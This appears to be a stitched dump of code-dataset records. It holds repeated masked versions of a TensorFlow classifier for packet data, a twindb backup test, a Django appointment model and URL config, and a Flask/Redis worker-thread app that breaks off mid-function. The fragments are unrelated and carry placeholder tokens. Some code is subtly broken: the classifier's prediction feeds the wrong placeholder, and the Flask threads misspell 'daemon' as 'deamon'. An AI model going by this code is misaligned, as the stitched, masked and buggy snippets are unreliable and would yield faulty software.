"step-5": "from django.contrib import admin\nfrom django.contrib.staticfiles.urls import static # 本Ch11.1\nfrom django.urls import path, include\n\nfrom . import settings_common, settings_dev # 本Ch11.1\nimport debug_toolbar\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('login_test_app.urls')),\n path('accounts/', include('allauth.urls')), # allauthデフォルトURL:本P218\n path('__debug__/', include(debug_toolbar.urls)),\n\n]\n\n# 開発サーバーでMEDIA_ROOT,MEDIA_URLを渡したdjango.contrib.staticfiles.urls.static関数から\n# 返されたルーティングを追加する\nurlpatterns +=static(settings_common.MEDIA_URL, document_root=settings_dev.MEDIA_ROOT)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[
'bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']
)
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']
)
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=
prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:
batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs,
'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)
)
result_array = np.append(result_array, result)
return result_array
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[
'bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']
)
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']
)
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=
prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:
batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs,
'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)
)
result_array = np.append(result_array, result)
return result_array
train_neural_network(x)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
train_x, train_y = array_packet()
x_input, input_ip = array_rule()
n_nodes_hl1 = 210
n_nodes_hl2 = 210
n_nodes_hl3 = 210
n_classes = 2
batch_size = 500
hm_epochs = 20
x = tf.placeholder('float')
y = tf.placeholder('float')
z = tf.placeholder('float')
hidden_1_layer = {'f_fum': n_nodes_hl1, 'weight': tf.Variable(tf.
random_normal([train_x.shape[1], n_nodes_hl1])), 'bias': tf.Variable(tf
.random_normal([n_nodes_hl1]))}
hidden_2_layer = {'f_fum': n_nodes_hl2, 'weight': tf.Variable(tf.
random_normal([n_nodes_hl1, n_nodes_hl2])), 'bias': tf.Variable(tf.
random_normal([n_nodes_hl2]))}
hidden_3_layer = {'f_fum': n_nodes_hl3, 'weight': tf.Variable(tf.
random_normal([n_nodes_hl2, n_nodes_hl3])), 'bias': tf.Variable(tf.
random_normal([n_nodes_hl3]))}
output_layer = {'f_fum': None, 'weight': tf.Variable(tf.random_normal([
n_nodes_hl3, n_classes])), 'bias': tf.Variable(tf.random_normal([
n_classes]))}
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[
'bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']
)
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']
)
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=
prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:
batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs,
'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)
)
result_array = np.append(result_array, result)
return result_array
train_neural_network(x)
<|reserved_special_token_1|>
from convert_data2 import array_rule
from convert_data2 import array_packet
import tensorflow as tf
import numpy as np
train_x, train_y = array_packet()
x_input, input_ip = array_rule()
n_nodes_hl1 = 210
n_nodes_hl2 = 210
n_nodes_hl3 = 210
n_classes = 2
batch_size = 500
hm_epochs = 20
x = tf.placeholder('float')
y = tf.placeholder('float')
z = tf.placeholder('float')
hidden_1_layer = {'f_fum': n_nodes_hl1, 'weight': tf.Variable(tf.
random_normal([train_x.shape[1], n_nodes_hl1])), 'bias': tf.Variable(tf
.random_normal([n_nodes_hl1]))}
hidden_2_layer = {'f_fum': n_nodes_hl2, 'weight': tf.Variable(tf.
random_normal([n_nodes_hl1, n_nodes_hl2])), 'bias': tf.Variable(tf.
random_normal([n_nodes_hl2]))}
hidden_3_layer = {'f_fum': n_nodes_hl3, 'weight': tf.Variable(tf.
random_normal([n_nodes_hl2, n_nodes_hl3])), 'bias': tf.Variable(tf.
random_normal([n_nodes_hl3]))}
output_layer = {'f_fum': None, 'weight': tf.Variable(tf.random_normal([
n_nodes_hl3, n_classes])), 'bias': tf.Variable(tf.random_normal([
n_classes]))}
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[
'bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']
)
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']
)
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=
prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:
batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs,
'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)
)
result_array = np.append(result_array, result)
return result_array
train_neural_network(x)
<|reserved_special_token_1|>
from convert_data2 import array_rule
from convert_data2 import array_packet
import tensorflow as tf
import numpy as np
train_x, train_y = array_packet()
x_input, input_ip = array_rule()
n_nodes_hl1 = 210
n_nodes_hl2 = 210
n_nodes_hl3 = 210
n_classes = 2
batch_size = 500
hm_epochs = 20
x = tf.placeholder('float')
y = tf.placeholder('float')
z = tf.placeholder('float')
hidden_1_layer = {'f_fum': n_nodes_hl1,
'weight': tf.Variable(tf.random_normal([train_x.shape[1], n_nodes_hl1])),
'bias': tf.Variable(tf.random_normal([n_nodes_hl1]))}
hidden_2_layer = {'f_fum': n_nodes_hl2,
'weight': tf.Variable(tf.random_normal([n_nodes_hl1, n_nodes_hl2])),
'bias': tf.Variable(tf.random_normal([n_nodes_hl2]))}
hidden_3_layer = {'f_fum': n_nodes_hl3,
'weight': tf.Variable(tf.random_normal([n_nodes_hl2, n_nodes_hl3])),
'bias': tf.Variable(tf.random_normal([n_nodes_hl3]))}
output_layer = {'f_fum': None,
'weight': tf.Variable(tf.random_normal([n_nodes_hl3, n_classes])),
'bias': tf.Variable(tf.random_normal([n_classes])), }
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer['bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias'])
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias'])
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x,
y: batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs, 'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = (sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)))
result_array = np.append(result_array, result)
return result_array
train_neural_network(x)
|
flexible
|
{
"blob_id": "1446268583bf9fa3375319eae3c21cf47f47faca",
"index": 7279,
"step-1": "<mask token>\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[\n 'bias'])\n l1 = tf.nn.relu(l1)\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']\n )\n l2 = tf.nn.relu(l2)\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']\n )\n l3 = tf.nn.relu(l3)\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=\n prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:\n batch_y})\n epoch_loss += c\n i += batch_size\n print('Epoch', epoch + 1, 'completed out of', hm_epochs,\n 'loss:', epoch_loss)\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)\n )\n result_array = np.append(result_array, result)\n return result_array\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[\n 'bias'])\n l1 = tf.nn.relu(l1)\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']\n )\n l2 = tf.nn.relu(l2)\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']\n )\n l3 = tf.nn.relu(l3)\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=\n prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:\n batch_y})\n epoch_loss += c\n i += batch_size\n print('Epoch', epoch + 1, 'completed out of', hm_epochs,\n 'loss:', epoch_loss)\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)\n )\n result_array = np.append(result_array, result)\n return result_array\n\n\ntrain_neural_network(x)\n",
"step-3": "<mask token>\ntrain_x, train_y = array_packet()\nx_input, input_ip = array_rule()\nn_nodes_hl1 = 210\nn_nodes_hl2 = 210\nn_nodes_hl3 = 210\nn_classes = 2\nbatch_size = 500\nhm_epochs = 20\nx = tf.placeholder('float')\ny = tf.placeholder('float')\nz = tf.placeholder('float')\nhidden_1_layer = {'f_fum': n_nodes_hl1, 'weight': tf.Variable(tf.\n random_normal([train_x.shape[1], n_nodes_hl1])), 'bias': tf.Variable(tf\n .random_normal([n_nodes_hl1]))}\nhidden_2_layer = {'f_fum': n_nodes_hl2, 'weight': tf.Variable(tf.\n random_normal([n_nodes_hl1, n_nodes_hl2])), 'bias': tf.Variable(tf.\n random_normal([n_nodes_hl2]))}\nhidden_3_layer = {'f_fum': n_nodes_hl3, 'weight': tf.Variable(tf.\n random_normal([n_nodes_hl2, n_nodes_hl3])), 'bias': tf.Variable(tf.\n random_normal([n_nodes_hl3]))}\noutput_layer = {'f_fum': None, 'weight': tf.Variable(tf.random_normal([\n n_nodes_hl3, n_classes])), 'bias': tf.Variable(tf.random_normal([\n n_classes]))}\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[\n 'bias'])\n l1 = tf.nn.relu(l1)\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']\n )\n l2 = tf.nn.relu(l2)\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']\n )\n l3 = tf.nn.relu(l3)\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=\n prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:\n batch_y})\n epoch_loss 
+= c\n i += batch_size\n print('Epoch', epoch + 1, 'completed out of', hm_epochs,\n 'loss:', epoch_loss)\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)\n )\n result_array = np.append(result_array, result)\n return result_array\n\n\ntrain_neural_network(x)\n",
"step-4": "from convert_data2 import array_rule\nfrom convert_data2 import array_packet\nimport tensorflow as tf\nimport numpy as np\ntrain_x, train_y = array_packet()\nx_input, input_ip = array_rule()\nn_nodes_hl1 = 210\nn_nodes_hl2 = 210\nn_nodes_hl3 = 210\nn_classes = 2\nbatch_size = 500\nhm_epochs = 20\nx = tf.placeholder('float')\ny = tf.placeholder('float')\nz = tf.placeholder('float')\nhidden_1_layer = {'f_fum': n_nodes_hl1, 'weight': tf.Variable(tf.\n random_normal([train_x.shape[1], n_nodes_hl1])), 'bias': tf.Variable(tf\n .random_normal([n_nodes_hl1]))}\nhidden_2_layer = {'f_fum': n_nodes_hl2, 'weight': tf.Variable(tf.\n random_normal([n_nodes_hl1, n_nodes_hl2])), 'bias': tf.Variable(tf.\n random_normal([n_nodes_hl2]))}\nhidden_3_layer = {'f_fum': n_nodes_hl3, 'weight': tf.Variable(tf.\n random_normal([n_nodes_hl2, n_nodes_hl3])), 'bias': tf.Variable(tf.\n random_normal([n_nodes_hl3]))}\noutput_layer = {'f_fum': None, 'weight': tf.Variable(tf.random_normal([\n n_nodes_hl3, n_classes])), 'bias': tf.Variable(tf.random_normal([\n n_classes]))}\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[\n 'bias'])\n l1 = tf.nn.relu(l1)\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']\n )\n l2 = tf.nn.relu(l2)\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']\n )\n l3 = tf.nn.relu(l3)\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=\n prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = 
np.array(train_y[start:end])\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:\n batch_y})\n epoch_loss += c\n i += batch_size\n print('Epoch', epoch + 1, 'completed out of', hm_epochs,\n 'loss:', epoch_loss)\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)\n )\n result_array = np.append(result_array, result)\n return result_array\n\n\ntrain_neural_network(x)\n",
"step-5": "from convert_data2 import array_rule\nfrom convert_data2 import array_packet\nimport tensorflow as tf\nimport numpy as np\n\ntrain_x, train_y = array_packet()\nx_input, input_ip = array_rule()\n\nn_nodes_hl1 = 210\nn_nodes_hl2 = 210\nn_nodes_hl3 = 210\n\nn_classes = 2\nbatch_size = 500\nhm_epochs = 20\n\nx = tf.placeholder('float')\ny = tf.placeholder('float')\nz = tf.placeholder('float')\n\nhidden_1_layer = {'f_fum': n_nodes_hl1,\n 'weight': tf.Variable(tf.random_normal([train_x.shape[1], n_nodes_hl1])),\n 'bias': tf.Variable(tf.random_normal([n_nodes_hl1]))}\n\nhidden_2_layer = {'f_fum': n_nodes_hl2,\n 'weight': tf.Variable(tf.random_normal([n_nodes_hl1, n_nodes_hl2])),\n 'bias': tf.Variable(tf.random_normal([n_nodes_hl2]))}\n\nhidden_3_layer = {'f_fum': n_nodes_hl3,\n 'weight': tf.Variable(tf.random_normal([n_nodes_hl2, n_nodes_hl3])),\n 'bias': tf.Variable(tf.random_normal([n_nodes_hl3]))}\n\noutput_layer = {'f_fum': None,\n 'weight': tf.Variable(tf.random_normal([n_nodes_hl3, n_classes])),\n 'bias': tf.Variable(tf.random_normal([n_classes])), }\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer['bias'])\n l1 = tf.nn.relu(l1)\n\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias'])\n l2 = tf.nn.relu(l2)\n\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias'])\n l3 = tf.nn.relu(l3)\n\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y 
= np.array(train_y[start:end])\n\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x,\n y: batch_y})\n epoch_loss += c\n i += batch_size\n\n print('Epoch', epoch + 1, 'completed out of', hm_epochs, 'loss:', epoch_loss)\n\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = (sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)))\n result_array = np.append(result_array, result)\n\n return result_array\n\ntrain_neural_network(x)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_get_latest_backup(raw_binlog_status):
instance = BinlogStatus(raw_binlog_status)
assert instance.get_latest_backup() == BinlogCopy(host='master1', name=
'mysqlbin005.bin', created_at=100504)
<|reserved_special_token_1|>
from twindb_backup.copy.binlog_copy import BinlogCopy
from twindb_backup.status.binlog_status import BinlogStatus
def test_get_latest_backup(raw_binlog_status):
instance = BinlogStatus(raw_binlog_status)
assert instance.get_latest_backup() == BinlogCopy(host='master1', name=
'mysqlbin005.bin', created_at=100504)
|
flexible
|
{
"blob_id": "0dc556336cee9e5f41c036c6fcf6da950216693c",
"index": 5910,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_get_latest_backup(raw_binlog_status):\n instance = BinlogStatus(raw_binlog_status)\n assert instance.get_latest_backup() == BinlogCopy(host='master1', name=\n 'mysqlbin005.bin', created_at=100504)\n",
"step-3": "from twindb_backup.copy.binlog_copy import BinlogCopy\nfrom twindb_backup.status.binlog_status import BinlogStatus\n\n\ndef test_get_latest_backup(raw_binlog_status):\n instance = BinlogStatus(raw_binlog_status)\n assert instance.get_latest_backup() == BinlogCopy(host='master1', name=\n 'mysqlbin005.bin', created_at=100504)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Appointment(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return self.first_name + self.last_name
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Appointment(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
phone_number = models.CharField(max_length=12, null=False)
date = models.DateField(null=True)
time = models.TimeField(default='10:00')
presciption = models.TextField(max_length=100, default='Write here')
status = models.CharField(max_length=10, choices=STATUS_CHOICES,
default='Pending')
def __str__(self):
return self.first_name + self.last_name
<|reserved_special_token_1|>
<|reserved_special_token_0|>
STATUS_CHOICES = ('Pending', 'Pending'), ('Completed', 'Completed')
class Appointment(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
phone_number = models.CharField(max_length=12, null=False)
date = models.DateField(null=True)
time = models.TimeField(default='10:00')
presciption = models.TextField(max_length=100, default='Write here')
status = models.CharField(max_length=10, choices=STATUS_CHOICES,
default='Pending')
def __str__(self):
return self.first_name + self.last_name
<|reserved_special_token_1|>
from django.db import models
STATUS_CHOICES = ('Pending', 'Pending'), ('Completed', 'Completed')
class Appointment(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
phone_number = models.CharField(max_length=12, null=False)
date = models.DateField(null=True)
time = models.TimeField(default='10:00')
presciption = models.TextField(max_length=100, default='Write here')
status = models.CharField(max_length=10, choices=STATUS_CHOICES,
default='Pending')
def __str__(self):
return self.first_name + self.last_name
<|reserved_special_token_1|>
from django.db import models
# Create your models here.
STATUS_CHOICES=(
('Pending','Pending'),
('Completed','Completed'))
class Appointment(models.Model):
first_name=models.CharField(max_length=100)
last_name=models.CharField(max_length=100)
phone_number=models.CharField(max_length=12,null=False)
date=models.DateField(null=True)
time=models.TimeField(default="10:00")
presciption = models.TextField(max_length=100,default="Write here")
status = models.CharField(max_length=10,choices=STATUS_CHOICES,default="Pending")
def __str__(self):
return self.first_name + self.last_name
|
flexible
|
{
"blob_id": "3343844bf49cb3f4d655613475e44a140ac3106d",
"index": 4505,
"step-1": "<mask token>\n\n\nclass Appointment(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.first_name + self.last_name\n",
"step-2": "<mask token>\n\n\nclass Appointment(models.Model):\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n phone_number = models.CharField(max_length=12, null=False)\n date = models.DateField(null=True)\n time = models.TimeField(default='10:00')\n presciption = models.TextField(max_length=100, default='Write here')\n status = models.CharField(max_length=10, choices=STATUS_CHOICES,\n default='Pending')\n\n def __str__(self):\n return self.first_name + self.last_name\n",
"step-3": "<mask token>\nSTATUS_CHOICES = ('Pending', 'Pending'), ('Completed', 'Completed')\n\n\nclass Appointment(models.Model):\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n phone_number = models.CharField(max_length=12, null=False)\n date = models.DateField(null=True)\n time = models.TimeField(default='10:00')\n presciption = models.TextField(max_length=100, default='Write here')\n status = models.CharField(max_length=10, choices=STATUS_CHOICES,\n default='Pending')\n\n def __str__(self):\n return self.first_name + self.last_name\n",
"step-4": "from django.db import models\nSTATUS_CHOICES = ('Pending', 'Pending'), ('Completed', 'Completed')\n\n\nclass Appointment(models.Model):\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n phone_number = models.CharField(max_length=12, null=False)\n date = models.DateField(null=True)\n time = models.TimeField(default='10:00')\n presciption = models.TextField(max_length=100, default='Write here')\n status = models.CharField(max_length=10, choices=STATUS_CHOICES,\n default='Pending')\n\n def __str__(self):\n return self.first_name + self.last_name\n",
"step-5": "from django.db import models\n\n# Create your models here.\n\nSTATUS_CHOICES=(\n ('Pending','Pending'),\n ('Completed','Completed'))\n\nclass Appointment(models.Model):\n first_name=models.CharField(max_length=100)\n last_name=models.CharField(max_length=100)\n phone_number=models.CharField(max_length=12,null=False)\n date=models.DateField(null=True)\n time=models.TimeField(default=\"10:00\")\n presciption = models.TextField(max_length=100,default=\"Write here\")\n status = models.CharField(max_length=10,choices=STATUS_CHOICES,default=\"Pending\")\n\n def __str__(self):\n return self.first_name + self.last_name ",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import os
import json
from threading import Thread
import time
from time import sleep
from flask import Flask, json, render_template, request
import redis
from collections import OrderedDict
import requests
from Queue import Queue
REGISTRAR_URL = 'http://cuteparty-registrar1.cfapps.io/update'
app = Flask(__name__)
port = int(os.getenv("PORT"))
vcap = json.loads(os.environ['VCAP_SERVICES'])
svc = vcap['rediscloud'][0]['credentials']
db = redis.StrictRedis(host=svc["hostname"], port=svc["port"], password=svc["password"],db=0)
application_name = json.loads(os.environ['VCAP_APPLICATION'])['application_name']
class Producer(Thread):
"""
Background thread for fetching instance info
"""
def __init__(self,queue):
"""
Constructor
"""
Thread.__init__(self)
self.queue = queue
def run(self):
"""
This is the run implementation of the background thread , which fetchs the instaces info.
"""
while True :
try:
instance_id = os.getenv("CF_INSTANCE_INDEX")
mydict = db.hgetall(application_name)
if instance_id not in mydict :
self.queue.put(instance_id)
except :
pass
finally:
pass
class Consumer(Thread):
"""
Backgrdound thread for fetching from Queue and updating redis
"""
def __init__(self,queue):
"""
Constrcutor
"""
Thread.__init__(self)
self.queue = queue
def run(self):
"""
Run method for background thread which updates redis
"""
while True :
try :
instance_id = self.queue.get()
db.hset(application_name,instance_id,1)
except:
pass
finally:
pass
class MasterUpdater(Thread):
"""
This background thread will update the aggregator/registrar app at provided url
"""
def __init__(self,db,appname):
"""
Constructor
"""
Thread.__init__(self)
self.db = db
self.appname = appname
def run(self):
"""
Run implementation of background thread which updates the aggregator
"""
while True :
try:
appinfo = self.db.hgetall(self.appname)
appinfo_str = json.dumps(appinfo)
data = {'applicationname':self.appname,'appinfo':appinfo_str}
response = requests.post(REGISTRAR_URL, data=data)
time.sleep(2)
except :
pass
def init_workers():
"""
This method is for starting all worker threads.
We are using three workers right now .
1. One for fetching latest instances info and adds to Queue
2. One for fetching from Queue and updating Redis
3. For updating the aggregator app , about this applications info.
All are deamon threads.
"""
party_queue = Queue()
p = Producer(party_queue)
p.daemon = True
c = Consumer(party_queue)
c.deamon= True
m = MasterUpdater(db,application_name)
m.deamon = True
p.start()
c.start()
m.start()
@app.route('/addthread')
def addthread():
"""
